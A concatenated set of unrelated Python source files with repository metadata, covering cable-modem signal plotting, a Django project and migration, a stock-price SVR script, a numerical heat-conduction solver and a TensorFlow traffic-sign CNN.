if num_missing != 0:
continue
minUsPower = min(minUsPower, power)
maxUsPower = max(maxUsPower, power)
timestamps = mdates.date2num(timestamps)
xfmt = mdates.DateFormatter('%Y-%m-%d %H:%M')
plt.figure(1)
plt.title('DOCSIS 3.0 downstream power')
ax = plt.gca()
ax.xaxis.set_major_formatter(xfmt)
ax.xaxis.set_major_locator(MultipleLocator(60/1440.0))
ax.xaxis.set_minor_locator(MultipleLocator(30/1440.0))
ax.yaxis.set_major_locator(MultipleLocator(1.0))
ax.yaxis.set_minor_locator(MultipleLocator(0.2))
for k in dsData.keys():
plt.plot(timestamps, dsData[k]['power'], label=str(k), alpha=0.7)
plt.xticks(rotation=85, fontsize=4)
plt.grid(True, which='major', linewidth=1)
plt.grid(True, which='minor', linewidth=0.5, linestyle='dotted')
plt.ylim(math.floor(minDsPower)-2, math.ceil(maxDsPower)+1)
plt.ylabel('Power (dBmV)')
plt.xlabel('Time')
ax.legend(loc='lower left', ncol=4, fontsize='xx-small')
plt.tight_layout()
plt.savefig('dsPower', dpi=300)
plt.figure(2)
plt.title('DOCSIS 3.0 downstream SNR')
ax = plt.gca()
ax.xaxis.set_major_formatter(xfmt)
ax.xaxis.set_major_locator(MultipleLocator(60/1440.0))
ax.xaxis.set_minor_locator(MultipleLocator(30/1440.0))
ax.yaxis.set_major_locator(MultipleLocator(1.0))
ax.yaxis.set_minor_locator(MultipleLocator(0.2))
for k in dsData.keys():
plt.plot(timestamps, dsData[k]['snr'], label=str(k), alpha=0.5)
plt.xticks(rotation=85, fontsize=4)
plt.grid(True, which='major', linewidth=1)
plt.grid(True, which='minor', linewidth=0.5, linestyle='dotted')
plt.ylim(math.floor(minDsSNR)-2, math.ceil(maxDsSNR)+1)
plt.ylabel('SNR (dB)')
plt.xlabel('Time')
ax.legend(loc='lower left', ncol=4, fontsize='xx-small')
plt.tight_layout()
plt.savefig('dsSNR', dpi=300)
plt.figure(3)
plt.title('DOCSIS 3.0 upstream power')
ax = plt.gca()
ax.xaxis.set_major_formatter(xfmt)
ax.xaxis.set_major_locator(MultipleLocator(60/1440.0))
ax.xaxis.set_minor_locator(MultipleLocator(30/1440.0))
ax.yaxis.set_major_locator(MultipleLocator(1.0))
ax.yaxis.set_minor_locator(MultipleLocator(0.2))
for k in usData.keys():
plt.plot(timestamps, usData[k]['power'], label=str(k), alpha=0.7, linewidth=2)
plt.xticks(rotation=85, fontsize=4)
plt.grid(True, which='major', linewidth=1)
plt.grid(True, which='minor', linewidth=0.5, linestyle='dotted')
plt.ylim(math.floor(minUsPower)-2, math.ceil(maxUsPower)+1)
plt.ylabel('Power (dBmV)')
plt.xlabel('Time')
ax.legend(loc='lower left', fontsize='xx-small')
plt.tight_layout()
plt.savefig('usPower', dpi=300)
plt.figure(4)
plt.title('DOCSIS 3.1 downstream power')
ax = plt.gca()
ax.xaxis.set_major_formatter(xfmt)
ax.xaxis.set_major_locator(MultipleLocator(60/1440.0))
ax.xaxis.set_minor_locator(MultipleLocator(30/1440.0))
ax.yaxis.set_major_locator(MultipleLocator(1.0))
ax.yaxis.set_minor_locator(MultipleLocator(0.2))
for k in ds31Data.keys():
plt.plot(timestamps, ds31Data[k]['power'], label=str(k), alpha=0.7)
plt.xticks(rotation=85, fontsize=4)
plt.grid(True, which='major', linewidth=1)
plt.grid(True, which='minor', linewidth=0.5, linestyle='dotted')
plt.ylim(math.floor(minDs31Power)-2, math.ceil(maxDs31Power)+1)
plt.ylabel('Power (dBmV)')
plt.xlabel('Time')
ax.legend(loc='lower left', ncol=4, fontsize='xx-small')
plt.tight_layout()
plt.savefig('ds31Power', dpi=300)
plt.figure(5)
plt.title('DOCSIS 3.1 downstream SNR')
ax = plt.gca()
ax.xaxis.set_major_formatter(xfmt)
ax.xaxis.set_major_locator(MultipleLocator(60/1440.0))
ax.xaxis.set_minor_locator(MultipleLocator(30/1440.0))
ax.yaxis.set_major_locator(MultipleLocator(1.0))
ax.yaxis.set_minor_locator(MultipleLocator(0.2))
for k in ds31Data.keys():
plt.plot(timestamps, ds31Data[k]['snr'], label=str(k), alpha=0.5)
plt.xticks(rotation=85, fontsize=4)
plt.grid(True, which='major', linewidth=1)
plt.grid(True, which='minor', linewidth=0.5, linestyle='dotted')
plt.ylim(math.floor(minDs31SNR)-2, math.ceil(maxDs31SNR)+1)
plt.ylabel('SNR (dB)')
plt.xlabel('Time')
ax.legend(loc='lower left', ncol=4, fontsize='xx-small')
plt.tight_layout()
plt.savefig('ds31SNR', dpi=300)
if __name__ == '__main__':
main(sorted(sys.argv[1:]))
| [
"edmonds@users.noreply.github.com"
] | edmonds@users.noreply.github.com |
651fc6d07593ca2c0031b84b6e7908d0418931c4 | ad20f980594bacea11eababc361ef2525b32d202 | /LearningPython/MatPlot Tests/Turtle.py | d8a8a64c8db1530abbd30d06a6ca12016298424a | [] | no_license | hashnet/PythonProjects | 4576852df3983f89e8f668a933ea73a943501aa4 | 5dd43ea2a2fd4d493fcb89121477a9495819e2ad | refs/heads/master | 2021-06-18T06:22:04.100976 | 2021-02-09T15:14:31 | 2021-02-09T15:14:31 | 168,465,818 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 469 | py | import turtle
import numpy as np
ratio = 15/20
# ratio = 1/2
# ratio = 2/1
# ratio = 3/2
# ratio = 1/1
# ratio = 5/4
turtle.speed(0)
turtle.bgcolor('black')
turtle.pencolor('white')
turtle.pensize(3)
turtle.penup()
cx = 0
cy = np.pi/2
dx = 0.06
dy = dx * ratio
m = 200
dm = 0.08
while True:
x = np.cos(cx) * m
y = np.cos(cy) * m
turtle.goto(x, y)
cx += dx
cy += dy
m -= dm
turtle.pendown()
if m < dm:
break
turtle.done() | [
"maidul.hasan@gmail.com"
] | maidul.hasan@gmail.com |
3992e4cfa297274e2d85355c42f979d6de7326c2 | f52997ac7e1b41f34018c3a0028ced8638072b2b | /src/peoplefinder/migrations/0090_data_person_new_country.py | 1745636c4926fcb0b87247bd92c8f80294e57bf4 | [
"MIT"
] | permissive | uktrade/digital-workspace-v2 | 49fae1fca819b625c6f6949fb5ce51b89fbcab96 | 7e328d0d55c9aa73be61f476823a743d96e792d0 | refs/heads/main | 2023-09-03T12:03:47.016608 | 2023-09-01T12:07:55 | 2023-09-01T12:07:55 | 232,302,840 | 6 | 0 | MIT | 2023-09-13T15:50:24 | 2020-01-07T10:41:18 | Python | UTF-8 | Python | false | false | 820 | py | # Generated by Django 3.2.13 on 2022-05-23 13:15
from django.db import migrations
def insert_person_new_country(apps, schema_editor):
Person = apps.get_model("peoplefinder", "Person")
Country = apps.get_model("countries", "Country")
all_people = Person.objects.select_related("country").all()
country_lookup = Country.objects.all().in_bulk(field_name="iso_2_code")
people_to_update = []
for person in all_people:
person.new_country = country_lookup[person.country.code]
people_to_update.append(person)
Person.objects.bulk_update(people_to_update, ["new_country"], batch_size=100)
class Migration(migrations.Migration):
dependencies = [
("peoplefinder", "0089_person_new_country"),
]
operations = [migrations.RunPython(insert_person_new_country)]
| [
"noreply@github.com"
] | uktrade.noreply@github.com |
6e6a39acc5558ad61c60d5fb89c785410abfbaeb | 7ed3fcc54ad72df9f6106cb5fc3bfb0021c0f548 | /src/modules/utils.py | 0f77a16ef299715d7c425fed3cf13118994d4cc8 | [] | no_license | jimpei8989/SPML-HW1 | 5fb3c9acdb0ccdce47783b182f1ad34616fb784c | 7d0fdcce65ba360b453d057037a6fd66d327cabd | refs/heads/master | 2023-01-06T15:17:58.287394 | 2020-11-06T02:51:58 | 2020-11-06T02:51:58 | 298,754,611 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,481 | py | from pytorchcv.model_provider import _models
all_pytorchcv_cifar10_models = [k for k in _models if k.endswith('cifar10')]
all_labels = ['airplane', 'automobile', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck']
proxy_models = list(map(lambda s: s + '_cifar10', [
'nin',
'resnet20',
'preresnet20',
'resnext29_32x4d',
'seresnet20',
'densenet40_k12',
'ror3_56',
'shakeshakeresnet20_2x16d',
]))
eval_models = {
'small': list(map(lambda s: s + '_cifar10', [
'resnet20',
'sepreresnet20',
'densenet40_k12',
'nin',
'resnext29_32x4d',
'pyramidnet110_a48',
])),
'proxy_exp': list(map(lambda s: s + '_cifar10', [
'resnet20',
'resnet1001',
'sepreresnet20',
'sepreresnet542bn',
'densenet40_k12',
'densenet100_k24',
'pyramidnet110_a48',
])),
'large': list(map(lambda s: s + '_cifar10', [
'nin',
'resnet20',
'resnet1001',
'resnet164bn',
'preresnet20',
'resnext29_32x4d',
'seresnet20',
'pyramidnet110_a48',
'densenet40_k12',
'xdensenet40_2_k24_bc',
'ror3_56',
'shakeshakeresnet20_2x16d',
'diaresnet20',
])),
'final': list(map(lambda s: s + '_cifar10', [
'nin',
'sepreresnet56',
'resnet1001',
'xdensenet40_2_k24_bc',
'ror3_110',
]))
}
# proxy_models = [
# 'resnet110_cifar10', # Top1Err: 3.69 / Params: 1.7M / FLOPs: 255M
# 'preresnet272bn_cifar10', # Top1Err: 3.25 / Params: 2.8M / FLOPs: 420M
# 'resnext29_32x4d_cifar10', # Top1Err: 3.15 / Params: 4.7M / FLOPs: 780M
# 'pyramidnet110_a48_cifar10', # Top1Err: 3.72 / Params: 1.7M / FLOPs: 408M
# 'densenet40_k36_bc_cifar10', # Top1Err: 4.04 / Params: 1.5M / FLOPs: 654M
# ]
# eval_models = [
# 'resnet110_cifar10', # Top1Err: 3.69 / Params: 1.7M / FLOPs: 255M
# 'resnet272bn_cifar10',
# 'preresnet272bn_cifar10', # Top1Err: 3.25 / Params: 2.8M / FLOPs: 420M
# 'resnext29_32x4d_cifar10', # Top1Err: 3.15 / Params: 4.7M / FLOPs: 780M
# 'seresnet272bn_cifar10',
# 'pyramidnet110_a48_cifar10', # Top1Err: 3.72 / Params: 1.7M / FLOPs: 408M
# 'densenet40_k36_bc_cifar10', # Top1Err: 4.04 / Params: 1.5M / FLOPs: 654M
# 'wrn16_10_cifar10',
# 'ror3_164_cifar10',
# 'shakeshakeresnet26_2x32d_cifar10',
# ]
| [
"jimpei8989@gmail.com"
] | jimpei8989@gmail.com |
89fa7db714dcbc3e06cc865abc3954b4cfe64ba0 | 37630a079d08e6b4b605235c20252fc5efb53f06 | /udyam/settings.py | bda0a33e12dcf28c53958bdc7072e7217fe4fe89 | [] | no_license | Suhani97/test-project | f36aa39c5a5cf9cb74c308f0bd841ab732b46dea | 791babeba2f39e27cc079e8aa8aedd40e719c300 | refs/heads/main | 2023-08-24T13:58:34.345641 | 2021-10-02T07:25:44 | 2021-10-02T07:25:44 | 412,722,581 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,361 | py | """
Django settings for udyam project.
Generated by 'django-admin startproject' using Django 3.2.7.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'django-insecure-v-y73s=j+a&bb!f+d34bik90#a6+rm3v)-yewy%ex8=@%3d$#5'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'udyam.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'udyam.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
| [
"noreply@github.com"
] | Suhani97.noreply@github.com |
0a1c1041724b7f4ef0353165683fefd5d16a4d0b | ad76a88383d90abeedd65f2628def0d51b4e3701 | /core/prediction/test.py | e44923fadf8b185054c58ac74330055b17077000 | [
"Apache-2.0"
] | permissive | Karagul/Market | 6eaf6fddaa6fa369ea85deb21b1554f8ffd0e55e | 62f7d7eae58ec81b3cfc6d12350a73f01a559463 | refs/heads/master | 2020-06-11T06:12:39.148599 | 2017-01-22T13:09:39 | 2017-01-22T13:09:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,207 | py | from core.database import stockdata
from sklearn.svm import SVR
from sklearn import preprocessing, grid_search
from sklearn.metrics import mean_squared_error, mean_absolute_error, median_absolute_error
import numpy as np
import matplotlib.pyplot as plt
import pickle
import sys
#sys.exit('This is too good to change. Don\'t run this.')
symbol = 'ITC'
# Get the data
link = stockdata.StockData()
splitDate = link.get_split_date(symbol)
startDate = splitDate if splitDate else '2015-01-01'
link.sfrom(startDate)
link.sto('2016-05-09')
allResults = link.get_sdata(symbol)
# Split into train and testing data
testSplit = 150
result = allResults[:testSplit]
test = allResults[-testSplit:]
# Extract required features and output values
features = result[:-1] # Features will be 0 to n-1
predictions = result[1:] # Outputs will be 1 to n
predictions = [row[0] for row in predictions] # Predict open and close values
# Transform into numpy arrays
X = np.array(features)
y = np.array(predictions)
# Pre-processing, transform to range [-1,1]
minMaxFeatures = preprocessing.MinMaxScaler((-1, 1))
minMaxPred = preprocessing.MinMaxScaler((-1, 1))
X = minMaxFeatures.fit_transform(features)
y = minMaxPred.fit_transform(predictions)
# Find the best parameters
# svr = SVR()
# parameters = {'C': [1, 10, 100, 1000], 'gamma': [0.001, 0.1, 1]}
# clf = grid_search.GridSearchCV(svr, parameters)
# clf.fit(X, y)
res_dict = dict()
with open('./../../upinkai/company_clf/'+symbol, 'rb') as file:
res_dict=pickle.load(file)
# Predict
svr = SVR(C=res_dict['svr'].get_params()['C'], gamma=res_dict['svr'].get_params()['gamma'])
svr.fit(X, y)
ans = svr.predict(minMaxFeatures.transform(test))
test = [row[0] for row in test]
ansO = minMaxPred.inverse_transform(ans)
errors = dict(
mse=mean_squared_error(test, ansO),
mean_ae=mean_absolute_error(test, ansO),
median_ae=median_absolute_error(test, ansO)
)
print(errors)
# with open('./../../upinkai/company_clf/'+symbol, 'wb') as file:
# pickle.dump(dict(svr=svr, minMaxPred=minMaxPred, minMaxFeatures=minMaxFeatures, startDate=startDate, errors=errors), file)
plt.plot(range(testSplit), test, 'blue', range(testSplit), ansO, 'red')
plt.show()
| [
"adarshdec23@gmail.com"
] | adarshdec23@gmail.com |
6ef3c83d36f6ec0220aac1a51684ae0b2282e8bf | bc3d701be4c74be92334b3d7274e7a768ef2301a | /example/models.py | b8947e702743d1797ee08a5c53da8eb8124cf228 | [
"BSD-2-Clause"
] | permissive | secretescapes/django-image-cropping | 4c28aa03a96b89a6f96a2bf844c8dd34810682e0 | b020cdbeb079e2aced37c95fcfc4f92310c32b6f | refs/heads/master | 2021-01-16T20:22:55.790304 | 2013-12-17T10:04:42 | 2013-12-17T10:04:42 | 8,149,406 | 0 | 0 | NOASSERTION | 2020-09-30T10:11:13 | 2013-02-11T23:38:14 | JavaScript | UTF-8 | Python | false | false | 460 | py | from django.db import models
from image_cropping.fields import ImageRatioField, ImageCropField
class Image(models.Model):
image_field = ImageCropField(upload_to='image/')
cropping = ImageRatioField('image_field', '120x100')
class Meta:
app_label = 'example'
class ImageFK(models.Model):
image = models.ForeignKey(Image)
cropping = ImageRatioField('image__image_field', '120x100')
class Meta:
app_label = 'example'
| [
"jvp@jonasundderwolf.de"
] | jvp@jonasundderwolf.de |
273b5505057d982021495dce3b256d262170721f | dfef605454cbeef93f732dde78dab0b354a21ab8 | /SortAndNavigation/search.py | d064a62e9b3572ecb43cd364eb1454f1780b5bc4 | [] | no_license | moonsung1234/algorithm_example | df85383c9a2791d6850da8da00ba9af977b3f111 | f3a2ef786f997f75a2209d7207aa8b5915820e23 | refs/heads/master | 2023-05-15T19:29:41.354458 | 2021-06-02T15:56:27 | 2021-06-02T15:56:27 | 365,147,561 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 168 | py |
def searchList(a, x) :
n = len(a)
for i in range(n) :
if x == a[i] :
return i
return -1
a = [1, 2, 3, 4, 5]
print(searchList(a, 1)) | [
"dit67890@gmail.com"
] | dit67890@gmail.com |
930fd3e4f431108378760e9867c272e65832e126 | 18e10adefe816a563fb71d3fdeefb4ac8944a409 | /10_days_of_statistics/basic_probability.py | e163287a4bfc4f23c56fa8e6b57fac5c21f5e0e1 | [] | no_license | hejo89/hackerrank | 51ddd0a51bbb70501293df26a8097f09d457a334 | cdb7c0bf1c8d25ba29fd83a4eae81a023704c402 | refs/heads/master | 2020-09-29T16:48:29.107278 | 2019-12-10T09:44:13 | 2019-12-10T09:44:13 | 227,076,517 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 83 | py | print len([i + k for i in range(1, 7) for k in range(1, 7) if i + k < 10]) / 36.0
| [
"johannes.hess.89@googlemail.com"
] | johannes.hess.89@googlemail.com |
c67cdd7563297c766de333e08bf9da4623eb1a76 | f9867ff04d805cf81c5b30332b1a9b7b131b745c | /hwk/hw4/tests/q25.py | 1592c757b23900549f40a4fa7cfc7bcf34f839fe | [] | no_license | MiaZhong/demog180-su2019 | e1db89e2e0147724176e77c0a223ccf4fc9dcff5 | 73ac474cbc18f2c1ac39fecc502fc6605b1fdbcc | refs/heads/master | 2020-06-15T13:37:04.436833 | 2019-08-09T06:40:50 | 2019-08-09T06:40:50 | 195,314,603 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 544 | py | test = {
'name': 'q25',
'points': 5,
'suites': [
{
'cases': [
{
'code': r"""
>>> sim_results.num_rows
800
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> np.round(np.mean(sim_results['num_infected_random']), 0)
71.0
""",
'hidden': False,
'locked': False
}
],
'scored': True,
'setup': '',
'teardown': '',
'type': 'doctest'
}
]
}
| [
"miazhongrj@gmail.com"
] | miazhongrj@gmail.com |
f8e4c1c00831915fad031f3764008c58b4f72f93 | 162e176ccf7d34c2d4258a4be66ca62758b87fee | /nonlinear.py | f32e672ebc5e966f942b3c4c7bfdaaaa1682702b | [] | no_license | desidisivaprakash/large-scale-numerical-simulations | 421d2cd18704b1dc155d994d31beff3f399246d1 | ce310847bcbba45619a750ffc75a48ff17b2ce74 | refs/heads/master | 2021-01-23T02:34:42.606763 | 2015-02-19T21:00:01 | 2015-02-19T21:00:01 | 31,033,867 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,595 | py | '''siva'''
import sys
import copy
import matplotlib.pyplot as plt
import matplotlib as mpl
from mpl_toolkits.mplot3d import Axes3D
import numpy as np
import random
from numpy import matrix
def drange(start, stop, step):
r = start
while r < stop:
yield r
r += step
def initial_guess(a):
#i = 0
#sample = []
#for rows in a:
#i += 1
#sample.append(i)
#random.shuffle(sample)
#print sample
sample= [300 for x in xrange(len(a))]
return sample
def condition_check(x, y):
##Change value of tolerence in here:
epsilon = 0.0001
for i in xrange(len(x)):
if (abs(x[i] - y[i])) <= epsilon:
continue
else:
#print "True"
return True
#print "False"
return False
def jacobi(a, b):
X = initial_guess(a)
condition = True
count = 0
while condition == True:
new_X = [0 for i in xrange(len(X))]
for i in xrange(len(X)):
sum = 0
for j in xrange(len(X)):
if j != i:
sum += (a[i][j])*(X[j])
new_X[i] = (1.0/a[i][i])*(b[i] - sum)
condition = condition_check(new_X, X)
count += 1
X = new_X
print "Total iterations for solving equations by Jacobi method:", count
return X
def gauss_seidel(a, b):
X = initial_guess(a)
condition = True
count2 = 0
while condition == True:
prev_X = copy.deepcopy(X)
for i in xrange(len(X)):
sum = 0
for j in xrange(len(X)):
if j != i:
sum += (a[i][j])*(X[j])
X[i] = (1.0/a[i][i])*(b[i] - sum)
condition = condition_check(prev_X, X)
count2 += 1
print count2
print "Total iterations for solving equations by Gauss-Seidel method:", count2
'''points = []
for as_point in xrange(Nx):
points.append(as_point*0.01)
plt.plot(points, X)
plt.xlabel('Length')
plt.ylabel('Temperature')
plt.title('Temperature variation alog the length of the rod')
plt.grid(True)
plt.savefig("output_rod_200_rand.png")
plt.show()'''
return X
def sor(a, b):
weights = []
iterations = []
for weight in drange(1.1, 1.99, 0.01):
#print weight
X = initial_guess(a)
condition = True
count3 = 0
weights.append(weight)
while condition == True:
prev_X = copy.deepcopy(X)
for i in xrange(len(X)):
sum = 0
for j in xrange(len(X)):
if j != i:
sum += (a[i][j])*(X[j])
X[i] = (weight)*(1.0/a[i][i])*(b[i] - sum) + (1 - weight)*(X[i])
condition = condition_check(prev_X, X)
count3 += 1
#print "Total iterations for solving equations by SOR method for weight", weight, ":", count3
#print X
iterations.append(count3)
minimum = iterations[1]
for p in xrange(1, len(iterations)):
temp = iterations[p]
if temp < minimum:
minimum = temp
index = p
min_iter = min(iterations)
print "Total iterations for solving equations by SOR method for optimum weight", weights[index], ":", iterations[index]
#print "assert: it is equal to:", min_iter
plt.plot(weights, iterations)
plt.xlabel('Weight assigned to Gauss Seidel method')
plt.ylabel('Iterations for reaching optimum solution')
plt.title('Iterations v/s Weight analysis for SOR method')
plt.grid(True)
plt.savefig("output_SOR.png")
plt.show()
return 2
def conduction(a, b, beta):
X = initial_guess(a)
condition = True
#count3 = 0
weight = 1.92
iteration = 1
master_X = []
while condition == True:
print iteration
iteration += 1
prev_X = copy.deepcopy(X)
# Improving B
b[0] = beta - T0
b[-1] = beta - T10
for i in xrange(1, len(b) - 1):
b[i] = beta + sigma*(delta_x**2)*(prev_X[i]**4)
for i in xrange(len(X)):
sum = 0
for j in xrange(len(X)):
if j != i:
sum += (a[i][j])*(X[j])
X[i] = (weight)*(1.0/a[i][i])*(b[i] - sum) + (1 - weight)*(X[i])
condition = condition_check(prev_X, X)
master_X.append(prev_X)
if condition == False:
master_X.append(X)
return master_X
def main():
## A matrix in Ax = B
### Problem ->
global Nx, delta_x, sigma, T0, T10
Nx = 200
delta_x = float(10)/Nx
t_air = 200
h = 0.05
sigma = 2.7e-8
#T = [0 for x in xrange(int(Nx))]
T0 = 300
T10 = 400
A = [[0 for x in xrange(int(Nx))] for x in xrange(int(Nx))]
alpha = 2 + (0.05)*(delta_x**2)
list1 = [1, -alpha, 1]
A[0][0] = -alpha
A[0][1] = 1
A[int(Nx)-1][int(Nx)-2] = 1
A[int(Nx)-1][int(Nx)-1] = -alpha
for x in xrange(1, int(Nx)-1):
list2 = copy.deepcopy(list1)
for y in xrange(x-1, int(Nx)):
if list2:
A[x][y] = list2.pop()
#print A
B = [0 for x in xrange(Nx)]
B[0] = -h*t_air*(delta_x**2) - T0
B[-1] = -h*t_air*(delta_x**2) - T10
for i in xrange(1, len(B)-1):
B[i] = -h*t_air*(delta_x**2)
#print B
beta = -h*t_air*(delta_x**2) - sigma*(t_air**4)*(delta_x**2)
## B matrix in Ax = B
print "\n"
#print "Solution:", jacobi(A, B), "\n\n"
#y = gauss_seidel(A, B)
#y=jacobi(A,B)
y=sor(A,B)
print "Solution:", y, "\n\n"
#useless_var = sor(A, B)
XX = conduction(A, B, beta)
#print x
points = []
for as_point in xrange(Nx):
points.append(as_point*delta_x)
print "Length of list", len(XX)
fig = plt.figure()
ax = fig.gca(projection='3d')
xx_index = 1
for list1 in XX:
ax.plot(points, list1, xx_index)
xx_index += 1
ax.plot(points, y, xx_index, label='Linear Solution')
ax.set_xlabel('Length')
ax.set_ylabel('Temperature')
ax.set_zlabel('Iterations')
ax.set_title('Temperature variation along the length of the rod')
#plt.savefig("output_final3.png")
ax.legend()
plt.show()
return 2
if __name__ == "__main__":
sys.exit(main())
| [
"desidisivaprakash@gmail.com"
] | desidisivaprakash@gmail.com |
03960f0f3fa5ef588fe7de7fb3dff054e493b677 | 90e1f9d99ab05ce34380f7b63ec3c6a2f02f3d62 | /src/team503/src/traffic_sign_detect/CNN_3channels_4conv.py | 18f641b42ae797f3a77c79becae44d8dd3b29087 | [] | no_license | sihcpro/The-Number1c-Rac1ng | eb038099c8deb6fbb6e88cde60c7a7f25474e5da | 856434acec52f52a8784199180692abbdb4a49e8 | refs/heads/master | 2020-04-12T10:07:24.182205 | 2019-01-15T22:21:43 | 2019-01-15T22:21:43 | 162,419,934 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,463 | py | import pickle
import cv2
from sklearn.utils import shuffle
import tensorflow as tf
TRAIN_DATA_DIR = "data/raw/training/augmented/"
TEST_DATA_DIR = "data/raw/testing"
# TEST_DATA_DIR = "data/raw/testing/00014"
CNN_MODEL_DIR = "model/CNN/3cnn_4conv.ckpt"
PICKLE_IMGS_DIR = "data/pickle/train_imgs_56.pkl"
PICKLE_LABELS_DIR = "data/pickle/test_labels.pkl"
NUM_CLASSES = 9
IMG_SIZE = 56
def deepnn(x):
with tf.name_scope('reshape'):
x_image = x
# x_image = tf.placeholder([-1, 28, 28, 3])
# First convolutional layer - maps one grayscale image to 32 feature maps.
with tf.name_scope('conv1'):
W_conv1 = weight_variable([5, 5, 3, 32])
b_conv1 = bias_variable([32])
h_conv1 = tf.nn.relu(conv2d(x_image, W_conv1) + b_conv1)
# Pooling layer - downsamples by 2X.
with tf.name_scope('pool1'):
h_pool1 = max_pool_2x2(h_conv1)
# Second convolutional layer -- maps 32 feature maps to 64.
with tf.name_scope('conv2'):
W_conv2 = weight_variable([5, 5, 32, 64])
b_conv2 = bias_variable([64])
h_conv2 = tf.nn.relu(conv2d(h_pool1, W_conv2) + b_conv2)
# Second pooling layer.
with tf.name_scope('pool2'):
h_pool2 = max_pool_2x2(h_conv2)
# Third convolutional layer -- maps 64 feature maps to 64.
with tf.name_scope('conv3'):
W_conv3 = weight_variable([5, 5, 64, 64])
b_conv3 = bias_variable([64])
h_conv3 = tf.nn.relu(conv2d(h_pool2, W_conv3) + b_conv3)
# Forth convolutional layer -- maps 64 feature maps to 64.
with tf.name_scope('conv4'):
W_conv4 = weight_variable([5, 5, 64, 64])
b_conv4 = bias_variable([64])
h_conv4 = tf.nn.relu(conv2d(h_conv3, W_conv4) + b_conv4)
# Third pooling layer.
with tf.name_scope('pool3'):
h_pool3 = max_pool_2x2(h_conv4)
# Fully connected layer 1 -- after 2 round of downsampling, our 28x28 image
# is down to 7x7x64 feature maps -- maps this to 1024 features.
with tf.name_scope('fc1'):
W_fc1 = weight_variable([7 * 7 * 64, 1024])
b_fc1 = bias_variable([1024])
h_pool3_flat = tf.reshape(h_pool3, [-1, 7 * 7 * 64])
h_fc1 = tf.nn.relu(tf.matmul(h_pool3_flat, W_fc1) + b_fc1)
# Dropout - controls the complexity of the model, prevents co-adaptation of
# features.
with tf.name_scope('dropout'):
keep_prob = tf.placeholder(tf.float32)
h_fc1_drop = tf.nn.dropout(h_fc1, keep_prob)
# Map the 1024 features to NUM_CLASSES classes, one for each digit
with tf.name_scope('fc2'):
W_fc2 = weight_variable([1024, NUM_CLASSES])
b_fc2 = bias_variable([NUM_CLASSES])
y_conv = tf.matmul(h_fc1_drop, W_fc2) + b_fc2
return y_conv, keep_prob
def conv2d(x, W):
"""conv2d returns a 2d convolution layer with full stride."""
return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding='SAME')
def max_pool_2x2(x):
"""max_pool_2x2 downsamples a feature map by 2X."""
return tf.nn.max_pool(x, ksize=[1, 2, 2, 1],
strides=[1, 2, 2, 1], padding='SAME')
def weight_variable(shape):
"""weight_variable generates a weight variable of a given shape."""
initial = tf.truncated_normal(shape, stddev=0.1)
return tf.Variable(initial)
def bias_variable(shape):
"""bias_variable generates a bias variable of a given shape."""
initial = tf.constant(0.1, shape=shape)
return tf.Variable(initial)
| [
"tvquocchi@gmail.com"
] | tvquocchi@gmail.com |
